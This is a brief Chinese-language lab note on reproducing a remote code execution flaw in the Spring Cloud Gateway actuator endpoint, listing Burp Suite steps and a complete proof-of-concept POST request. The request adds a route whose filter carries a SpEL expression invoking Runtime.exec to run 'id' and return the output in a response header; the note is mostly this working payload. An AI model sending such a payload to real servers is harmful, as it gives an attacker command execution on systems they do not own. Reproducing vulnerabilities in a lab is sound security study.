环境搭建
启动容器
漏洞复现
浏览访问
bp抓包
转换为post请求
右键-》Change request method
发送Repeater模块
修改提交数据(poc)
POST /actuator/gateway/routes/fuck HTTP/1.1
Content-Type: application/json
{
"id": "fuck",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
刷新请求
访问文件执行